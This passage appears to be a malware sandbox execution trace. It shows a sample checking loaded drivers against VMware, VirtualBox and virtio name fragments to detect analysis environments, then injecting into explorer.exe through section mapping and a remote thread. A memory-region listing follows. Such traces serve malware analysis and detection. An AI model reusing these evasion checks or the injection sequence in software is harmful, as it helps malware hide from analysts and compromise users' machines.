_SubStr="vboxgu") returned 0x0 [0099.314] strstr (_Str="kd.dll", _SubStr="vboxsf") returned 0x0 [0099.314] strstr (_Str="kd.dll", _SubStr="vboxmo") returned 0x0 [0099.314] strstr (_Str="kd.dll", _SubStr="vboxvi") returned 0x0 [0099.314] strstr (_Str="kd.dll", _SubStr="vboxdi") returned 0x0 [0099.314] strstr (_Str="kd.dll", _SubStr="vioser") returned 0x0 [0099.315] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmci.s") returned 0x0 [0099.315] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmusbm") returned 0x0 [0099.315] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmous") returned 0x0 [0099.315] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vm3dmp") returned 0x0 [0099.315] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmrawd") returned 0x0 [0099.315] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmemc") returned 0x0 [0099.315] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxgu") returned 0x0 [0099.315] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxsf") returned 0x0 [0099.315] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxmo") returned 0x0 [0099.315] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxvi") returned 0x0 [0099.315] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxdi") returned 0x0 [0099.315] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vioser") returned 0x0 [0099.316] strstr (_Str="werkernel.sys", _SubStr="vmci.s") returned 0x0 [0099.316] strstr (_Str="werkernel.sys", _SubStr="vmusbm") returned 0x0 [0099.316] strstr (_Str="werkernel.sys", _SubStr="vmmous") returned 0x0 [0099.316] strstr (_Str="werkernel.sys", _SubStr="vm3dmp") returned 0x0 [0099.316] strstr (_Str="werkernel.sys", _SubStr="vmrawd") returned 0x0 [0099.316] strstr (_Str="werkernel.sys", _SubStr="vmmemc") returned 0x0 [0099.316] strstr (_Str="werkernel.sys", _SubStr="vboxgu") returned 0x0 [0099.316] strstr (_Str="werkernel.sys", _SubStr="vboxsf") returned 0x0 [0099.316] strstr (_Str="werkernel.sys", _SubStr="vboxmo") returned 0x0 [0099.316] strstr (_Str="werkernel.sys", _SubStr="vboxvi") returned 0x0 [0099.316] strstr (_Str="werkernel.sys", _SubStr="vboxdi") returned 0x0 [0099.316] strstr (_Str="werkernel.sys", _SubStr="vioser") returned 0x0 [0099.316] strstr (_Str="clfs.sys", _SubStr="vmci.s") returned 0x0 [0099.316] strstr (_Str="clfs.sys", _SubStr="vmusbm") returned 0x0 [0099.316] strstr (_Str="clfs.sys", _SubStr="vmmous") returned 0x0 [0099.316] strstr (_Str="clfs.sys", _SubStr="vm3dmp") returned 0x0 [0099.316] strstr (_Str="clfs.sys", _SubStr="vmrawd") returned 0x0 [0099.316] strstr (_Str="clfs.sys", _SubStr="vmmemc") returned 0x0 [0099.316] strstr (_Str="clfs.sys", _SubStr="vboxgu") returned 0x0 [0099.316] strstr (_Str="clfs.sys", _SubStr="vboxsf") returned 0x0 [0099.316] strstr (_Str="clfs.sys", _SubStr="vboxmo") returned 0x0 [0099.316] strstr (_Str="clfs.sys", _SubStr="vboxvi") returned 0x0 [0099.316] strstr (_Str="clfs.sys", _SubStr="vboxdi") returned 0x0 [0099.316] strstr (_Str="clfs.sys", _SubStr="vioser") returned 0x0 [0099.316] strstr (_Str="tm.sys", _SubStr="vmci.s") returned 0x0 [0099.316] strstr (_Str="tm.sys", _SubStr="vmusbm") returned 0x0 [0099.316] strstr (_Str="tm.sys", _SubStr="vmmous") returned 0x0 [0099.316] strstr (_Str="tm.sys", _SubStr="vm3dmp") returned 0x0 [0099.317] strstr (_Str="tm.sys", _SubStr="vmrawd") returned 0x0 [0099.317] strstr (_Str="tm.sys", _SubStr="vmmemc") returned 0x0 [0099.317] strstr (_Str="tm.sys", _SubStr="vboxgu") returned 0x0 [0099.317] strstr (_Str="tm.sys", _SubStr="vboxsf") returned 0x0 [0099.317] strstr (_Str="tm.sys", _SubStr="vboxmo") returned 0x0 [0099.317] strstr (_Str="tm.sys", _SubStr="vboxvi") returned 0x0 [0099.317] strstr (_Str="tm.sys", _SubStr="vboxdi") returned 0x0 [0099.317] strstr (_Str="tm.sys", _SubStr="vioser") returned 0x0 [0099.317] strstr (_Str="pshed.dll", _SubStr="vmci.s") returned 0x0 [0099.317] strstr (_Str="pshed.dll", _SubStr="vmusbm") returned 0x0 [0099.317] strstr (_Str="pshed.dll", _SubStr="vmmous") returned 0x0 [0099.317] strstr (_Str="pshed.dll", _SubStr="vm3dmp") returned 0x0 [0099.317] strstr (_Str="pshed.dll", _SubStr="vmrawd") returned 0x0 [0099.317] strstr (_Str="pshed.dll", _SubStr="vmmemc") returned 0x0 [0099.317] strstr (_Str="pshed.dll", _SubStr="vboxgu") returned 0x0 [0099.317] strstr (_Str="pshed.dll", _SubStr="vboxsf") returned 0x0 [0099.317] strstr (_Str="pshed.dll", _SubStr="vboxmo") returned 0x0 [0099.317] strstr (_Str="pshed.dll", _SubStr="vboxvi") returned 0x0 [0099.317] strstr (_Str="pshed.dll", _SubStr="vboxdi") returned 0x0 [0099.317] strstr (_Str="pshed.dll", _SubStr="vioser") returned 0x0 [0099.317] strstr (_Str="bootvid.dll", _SubStr="vmci.s") returned 0x0 [0099.317] strstr (_Str="bootvid.dll", _SubStr="vmusbm") returned 0x0 [0099.317] strstr (_Str="bootvid.dll", _SubStr="vmmous") returned 0x0 [0099.317] strstr (_Str="bootvid.dll", _SubStr="vm3dmp") returned 0x0 [0099.317] strstr (_Str="bootvid.dll", _SubStr="vmrawd") returned 0x0 [0099.318] strstr (_Str="bootvid.dll", _SubStr="vmmemc") returned 0x0 [0099.318] strstr (_Str="bootvid.dll", _SubStr="vboxgu") returned 0x0 [0099.318] strstr (_Str="bootvid.dll", _SubStr="vboxsf") returned 0x0 [0099.318] strstr (_Str="bootvid.dll", _SubStr="vboxmo") returned 0x0 [0099.318] strstr (_Str="bootvid.dll", _SubStr="vboxvi") returned 0x0 [0099.318] strstr (_Str="bootvid.dll", _SubStr="vboxdi") returned 0x0 [0099.318] strstr (_Str="bootvid.dll", _SubStr="vioser") returned 0x0 [0099.318] strstr (_Str="cmimcext.sys", _SubStr="vmci.s") returned 0x0 [0099.318] strstr (_Str="cmimcext.sys", _SubStr="vmusbm") returned 0x0 [0099.318] strstr (_Str="cmimcext.sys", _SubStr="vmmous") returned 0x0 [0099.318] strstr (_Str="cmimcext.sys", _SubStr="vm3dmp") returned 0x0 [0099.318] strstr (_Str="cmimcext.sys", _SubStr="vmrawd") returned 0x0 [0099.318] strstr (_Str="cmimcext.sys", _SubStr="vmmemc") returned 0x0 [0099.318] strstr (_Str="cmimcext.sys", _SubStr="vboxgu") returned 0x0 [0099.318] strstr (_Str="cmimcext.sys", _SubStr="vboxsf") returned 0x0 [0099.318] strstr (_Str="cmimcext.sys", _SubStr="vboxmo") returned 0x0 [0099.318] strstr (_Str="cmimcext.sys", _SubStr="vboxvi") returned 0x0 [0099.318] strstr (_Str="cmimcext.sys", _SubStr="vboxdi") returned 0x0 [0099.318] strstr (_Str="cmimcext.sys", _SubStr="vioser") returned 0x0 [0099.318] strstr (_Str="ntosext.sys", _SubStr="vmci.s") returned 0x0 [0099.318] strstr (_Str="ntosext.sys", _SubStr="vmusbm") returned 0x0 [0099.318] strstr (_Str="ntosext.sys", _SubStr="vmmous") returned 0x0 [0099.318] strstr (_Str="ntosext.sys", _SubStr="vm3dmp") returned 0x0 [0099.319] strstr (_Str="ntosext.sys", _SubStr="vmrawd") returned 0x0 [0099.319] strstr (_Str="ntosext.sys", _SubStr="vmmemc") returned 0x0 [0099.319] strstr (_Str="ntosext.sys", _SubStr="vboxgu") returned 0x0 [0099.319] strstr (_Str="ntosext.sys", _SubStr="vboxsf") returned 0x0 [0099.319] strstr (_Str="ntosext.sys", _SubStr="vboxmo") returned 0x0 [0099.319] strstr (_Str="ntosext.sys", _SubStr="vboxvi") returned 0x0 [0099.319] strstr (_Str="ntosext.sys", _SubStr="vboxdi") returned 0x0 [0099.319] strstr (_Str="ntosext.sys", _SubStr="vioser") returned 0x0 [0099.319] strstr (_Str="ci.dll", _SubStr="vmci.s") returned 0x0 [0099.319] strstr (_Str="ci.dll", _SubStr="vmusbm") returned 0x0 [0099.319] strstr (_Str="ci.dll", _SubStr="vmmous") returned 0x0 [0099.319] strstr (_Str="ci.dll", _SubStr="vm3dmp") returned 0x0 [0099.319] strstr (_Str="ci.dll", _SubStr="vmrawd") returned 0x0 [0099.319] strstr (_Str="ci.dll", _SubStr="vmmemc") returned 0x0 [0099.319] strstr (_Str="ci.dll", _SubStr="vboxgu") returned 0x0 [0099.319] strstr (_Str="ci.dll", _SubStr="vboxsf") returned 0x0 [0099.319] strstr (_Str="ci.dll", _SubStr="vboxmo") returned 0x0 [0099.319] strstr (_Str="ci.dll", _SubStr="vboxvi") returned 0x0 [0099.319] strstr (_Str="ci.dll", _SubStr="vboxdi") returned 0x0 [0099.319] strstr (_Str="ci.dll", _SubStr="vioser") returned 0x0 [0099.319] strstr (_Str="msrpc.sys", _SubStr="vmci.s") returned 0x0 [0099.319] strstr (_Str="msrpc.sys", _SubStr="vmusbm") returned 0x0 [0099.319] strstr (_Str="msrpc.sys", _SubStr="vmmous") returned 0x0 [0099.319] strstr (_Str="msrpc.sys", _SubStr="vm3dmp") returned 0x0 [0099.319] strstr (_Str="msrpc.sys", _SubStr="vmrawd") returned 0x0 [0099.319] strstr (_Str="msrpc.sys", _SubStr="vmmemc") returned 0x0 [0099.319] strstr (_Str="msrpc.sys", _SubStr="vboxgu") returned 0x0 [0099.319] strstr (_Str="msrpc.sys", _SubStr="vboxsf") returned 0x0 [0099.319] strstr (_Str="msrpc.sys", _SubStr="vboxmo") returned 0x0 [0099.320] strstr (_Str="msrpc.sys", _SubStr="vboxvi") returned 0x0 [0099.320] strstr (_Str="msrpc.sys", _SubStr="vboxdi") returned 0x0 [0099.320] strstr (_Str="msrpc.sys", _SubStr="vioser") returned 0x0 [0099.320] strstr (_Str="fltmgr.sys", _SubStr="vmci.s") returned 0x0 [0099.320] strstr (_Str="fltmgr.sys", _SubStr="vmusbm") returned 0x0 [0099.320] strstr (_Str="fltmgr.sys", _SubStr="vmmous") returned 0x0 [0099.320] strstr (_Str="fltmgr.sys", _SubStr="vm3dmp") returned 0x0 [0099.320] strstr (_Str="fltmgr.sys", _SubStr="vmrawd") returned 0x0 [0099.320] strstr (_Str="fltmgr.sys", _SubStr="vmmemc") returned 0x0 [0099.320] strstr (_Str="fltmgr.sys", _SubStr="vboxgu") returned 0x0 [0099.320] strstr (_Str="fltmgr.sys", _SubStr="vboxsf") returned 0x0 [0099.320] strstr (_Str="fltmgr.sys", _SubStr="vboxmo") returned 0x0 [0099.320] strstr (_Str="fltmgr.sys", _SubStr="vboxvi") returned 0x0 [0099.320] strstr (_Str="fltmgr.sys", _SubStr="vboxdi") returned 0x0 [0099.320] strstr (_Str="fltmgr.sys", _SubStr="vioser") returned 0x0 [0099.320] strstr (_Str="ksecdd.sys", _SubStr="vmci.s") returned 0x0 [0099.320] strstr (_Str="ksecdd.sys", _SubStr="vmusbm") returned 0x0 [0099.320] strstr (_Str="ksecdd.sys", _SubStr="vmmous") returned 0x0 [0099.320] strstr (_Str="ksecdd.sys", _SubStr="vm3dmp") returned 0x0 [0099.320] strstr (_Str="ksecdd.sys", _SubStr="vmrawd") returned 0x0 [0099.320] strstr (_Str="ksecdd.sys", _SubStr="vmmemc") returned 0x0 [0099.320] strstr (_Str="ksecdd.sys", _SubStr="vboxgu") returned 0x0 [0099.320] strstr (_Str="ksecdd.sys", _SubStr="vboxsf") returned 0x0 [0099.321] strstr (_Str="ksecdd.sys", _SubStr="vboxmo") returned 0x0 [0099.321] strstr (_Str="ksecdd.sys", _SubStr="vboxvi") returned 0x0 [0099.321] strstr (_Str="ksecdd.sys", _SubStr="vboxdi") returned 0x0 [0099.321] strstr (_Str="ksecdd.sys", _SubStr="vioser") returned 0x0 [0099.321] strstr (_Str="clipsp.sys", _SubStr="vmci.s") returned 0x0 [0099.321] strstr (_Str="clipsp.sys", _SubStr="vmusbm") returned 0x0 [0099.321] strstr (_Str="clipsp.sys", _SubStr="vmmous") returned 0x0 [0099.321] strstr (_Str="clipsp.sys", _SubStr="vm3dmp") returned 0x0 [0099.321] strstr (_Str="clipsp.sys", _SubStr="vmrawd") returned 0x0 [0099.321] strstr (_Str="clipsp.sys", _SubStr="vmmemc") returned 0x0 [0099.321] strstr (_Str="clipsp.sys", _SubStr="vboxgu") returned 0x0 [0099.321] strstr (_Str="clipsp.sys", _SubStr="vboxsf") returned 0x0 [0099.321] strstr (_Str="clipsp.sys", _SubStr="vboxmo") returned 0x0 [0099.321] strstr (_Str="clipsp.sys", _SubStr="vboxvi") returned 0x0 [0099.321] strstr (_Str="clipsp.sys", _SubStr="vboxdi") returned 0x0 [0099.321] strstr (_Str="clipsp.sys", _SubStr="vioser") returned 0x0 [0099.321] strstr (_Str="wdf01000.sys", _SubStr="vmci.s") returned 0x0 [0099.321] strstr (_Str="wdf01000.sys", _SubStr="vmusbm") returned 0x0 [0099.321] strstr (_Str="wdf01000.sys", _SubStr="vmmous") returned 0x0 [0099.321] strstr (_Str="wdf01000.sys", _SubStr="vm3dmp") returned 0x0 [0099.321] strstr (_Str="wdf01000.sys", _SubStr="vmrawd") returned 0x0 [0099.321] strstr (_Str="wdf01000.sys", _SubStr="vmmemc") returned 0x0 [0099.321] strstr (_Str="wdf01000.sys", _SubStr="vboxgu") returned 0x0 [0099.321] strstr (_Str="wdf01000.sys", _SubStr="vboxsf") returned 0x0 [0099.322] strstr (_Str="wdf01000.sys", _SubStr="vboxmo") returned 0x0 [0099.322] strstr (_Str="wdf01000.sys", _SubStr="vboxvi") returned 0x0 [0099.322] strstr (_Str="wdf01000.sys", _SubStr="vboxdi") returned 0x0 [0099.322] strstr (_Str="wdf01000.sys", _SubStr="vioser") returned 0x0 [0099.322] strstr (_Str="wdfldr.sys", _SubStr="vmci.s") returned 0x0 [0099.322] strstr (_Str="wdfldr.sys", _SubStr="vmusbm") returned 0x0 [0099.322] strstr (_Str="wdfldr.sys", _SubStr="vmmous") returned 0x0 [0099.322] strstr (_Str="wdfldr.sys", _SubStr="vm3dmp") returned 0x0 [0099.322] strstr (_Str="wdfldr.sys", _SubStr="vmrawd") returned 0x0 [0099.322] strstr (_Str="wdfldr.sys", _SubStr="vmmemc") returned 0x0 [0099.322] strstr (_Str="wdfldr.sys", _SubStr="vboxgu") returned 0x0 [0099.322] strstr (_Str="wdfldr.sys", _SubStr="vboxsf") returned 0x0 [0099.322] strstr (_Str="wdfldr.sys", _SubStr="vboxmo") returned 0x0 [0099.322] strstr (_Str="wdfldr.sys", _SubStr="vboxvi") returned 0x0 [0099.322] strstr (_Str="wdfldr.sys", _SubStr="vboxdi") returned 0x0 [0099.322] strstr (_Str="wdfldr.sys", _SubStr="vioser") returned 0x0 [0099.322] strstr (_Str="acpiex.sys", _SubStr="vmci.s") returned 0x0 [0099.322] strstr (_Str="acpiex.sys", _SubStr="vmusbm") returned 0x0 [0099.322] strstr (_Str="acpiex.sys", _SubStr="vmmous") returned 0x0 [0099.322] strstr (_Str="acpiex.sys", _SubStr="vm3dmp") returned 0x0 [0099.322] strstr (_Str="acpiex.sys", _SubStr="vmrawd") returned 0x0 [0099.322] strstr (_Str="acpiex.sys", _SubStr="vmmemc") returned 0x0 [0099.322] strstr (_Str="acpiex.sys", _SubStr="vboxgu") returned 0x0 [0099.322] strstr (_Str="acpiex.sys", _SubStr="vboxsf") returned 0x0 [0099.322] strstr (_Str="acpiex.sys", _SubStr="vboxmo") returned 0x0 [0099.323] strstr (_Str="acpiex.sys", _SubStr="vboxvi") returned 0x0 [0099.323] strstr (_Str="acpiex.sys", _SubStr="vboxdi") returned 0x0 [0099.323] strstr (_Str="acpiex.sys", _SubStr="vioser") returned 0x0 [0099.323] strstr (_Str="wpprecorder.sys", _SubStr="vmci.s") returned 0x0 [0099.323] strstr (_Str="wpprecorder.sys", _SubStr="vmusbm") returned 0x0 [0099.323] strstr (_Str="wpprecorder.sys", _SubStr="vmmous") returned 0x0 [0099.323] strstr (_Str="wpprecorder.sys", _SubStr="vm3dmp") returned 0x0 [0099.323] strstr (_Str="wpprecorder.sys", _SubStr="vmrawd") returned 0x0 [0099.323] strstr (_Str="wpprecorder.sys", _SubStr="vmmemc") returned 0x0 [0099.323] strstr (_Str="wpprecorder.sys", _SubStr="vboxgu") returned 0x0 [0099.323] strstr (_Str="wpprecorder.sys", _SubStr="vboxsf") returned 0x0 [0099.323] strstr (_Str="wpprecorder.sys", _SubStr="vboxmo") returned 0x0 [0099.323] strstr (_Str="wpprecorder.sys", _SubStr="vboxvi") returned 0x0 [0099.323] strstr (_Str="wpprecorder.sys", _SubStr="vboxdi") returned 0x0 [0099.323] strstr (_Str="wpprecorder.sys", _SubStr="vioser") returned 0x0 [0099.323] strstr (_Str="cng.sys", _SubStr="vmci.s") returned 0x0 [0099.323] strstr (_Str="cng.sys", _SubStr="vmusbm") returned 0x0 [0099.323] strstr (_Str="cng.sys", _SubStr="vmmous") returned 0x0 [0099.323] strstr (_Str="cng.sys", _SubStr="vm3dmp") returned 0x0 [0099.323] strstr (_Str="cng.sys", _SubStr="vmrawd") returned 0x0 [0099.323] strstr (_Str="cng.sys", _SubStr="vmmemc") returned 0x0 [0099.323] strstr (_Str="cng.sys", _SubStr="vboxgu") returned 0x0 [0099.323] strstr (_Str="cng.sys", _SubStr="vboxsf") returned 0x0 [0099.323] strstr (_Str="cng.sys", _SubStr="vboxmo") returned 0x0 [0099.324] LocalFree (hMem=0x1e12050) returned 0x0 [0099.324] Sleep (dwMilliseconds=0x1388) [0104.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ff1c*=0x0, ZeroBits=0x0, RegionSize=0x19ff24*=0x5200, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x19ff1c*=0x420000, RegionSize=0x19ff24*=0x6000) returned 0x0 [0104.391] GetShellWindow () returned 0x100d0 [0104.392] GetWindowThreadProcessId (in: hWnd=0x100d0, lpdwProcessId=0x19fec8 | out: lpdwProcessId=0x19fec8) returned 0x668 [0104.392] NtOpenProcess (in: ProcessHandle=0x19ff18, DesiredAccess=0x40, ObjectAttributes=0x19ff00*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19fef8*(UniqueProcess=0x664, UniqueThread=0x0) | out: ProcessHandle=0x19ff18*=0x15c) returned 0x0 [0104.392] NtDuplicateObject (in: SourceProcessHandle=0x15c, SourceHandle=0xffffffff, TargetProcessHandle=0xffffffff, TargetHandle=0x19ff1c, DesiredAccess=0x0, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x19ff1c*=0x160) returned 0x0 [0104.392] NtCreateSection (in: SectionHandle=0x19fed4, DesiredAccess=0x6, ObjectAttributes=0x0, MaximumSize=0x19fed8, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19fed4*=0x164) returned 0x0 [0104.392] NtMapViewOfSection (in: SectionHandle=0x164, ProcessHandle=0xffffffff, BaseAddress=0x19fee4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19fee4*=0x430000, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000) returned 0x0 [0104.393] NtMapViewOfSection (in: SectionHandle=0x164, ProcessHandle=0x160, BaseAddress=0x19feec*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19feec*=0x410000, SectionOffset=0x0, ViewSize=0x19fef0*=0x5000) returned 0x0 [0107.767] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x430000, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\toolspab3.exe")) returned 0x2b [0107.767] NtCreateSection (in: SectionHandle=0x19fed0, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x19fed8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19fed0*=0x168) returned 0x0 [0107.767] NtMapViewOfSection (in: SectionHandle=0x168, ProcessHandle=0xffffffff, BaseAddress=0x19fee0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x15200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19fee0*=0x520000, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000) returned 0x0 [0107.767] NtMapViewOfSection (in: SectionHandle=0x168, ProcessHandle=0x160, BaseAddress=0x19fee8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x20 | out: BaseAddress=0x19fee8*=0x420000, SectionOffset=0x0, ViewSize=0x19fef0*=0x16000) returned 0x0 [0107.770] RtlCreateUserThread (in: ProcessHandle=0x160, SecurityDescriptor=0x0, CreateSuspended=0, StackZeroBits=0x0, StackReserve=0x0, StackCommit=0x0, StartAddress=0x421930, Parameter=0x410000, ThreadHandle=0x19fe30*=0x5601e12048, ClientId=0x0 | out: ThreadHandle=0x19fe30*=0x16c, ClientId=0x0) returned 0x0 [0107.771] NtTerminateProcess (ProcessHandle=0xffffffff, ExitStatus=0x0) Thread: id = 4 os_tid = 0x12ec Process: id = "3" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x37928000" os_pid = "0x664" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "2" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 384 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 385 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 386 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 387 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 388 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 389 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 390 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 391 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 392 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 393 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 394 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 395 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 396 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 397 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 398 start_va = 0x410000 end_va = 0x414fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 399 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 400 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 401 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 402 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 403 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 404 start_va = 0x4d0000 end_va = 0x4d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 405 start_va = 0x4e0000 end_va = 0x4f2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 406 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 407 start_va = 0x510000 end_va = 0x528fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000c.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000c.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000c.db") Region: id = 408 start_va = 0x530000 end_va = 0x531fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 409 start_va = 0x540000 end_va = 0x541fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 410 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 411 start_va = 0x560000 end_va = 0x561fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 412 start_va = 0x570000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 413 start_va = 0x670000 end_va = 0x7f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 414 start_va = 0x800000 end_va = 0x980fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 415 start_va = 0x990000 end_va = 0x1d8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 416 start_va = 0x1d90000 end_va = 0x218afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d90000" filename = "" Region: id = 417 start_va = 0x2190000 end_va = 0x21bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002190000" filename = "" Region: id = 418 start_va = 0x21c0000 end_va = 0x21c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021c0000" filename = "" Region: id = 419 start_va = 0x21d0000 end_va = 0x21d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: 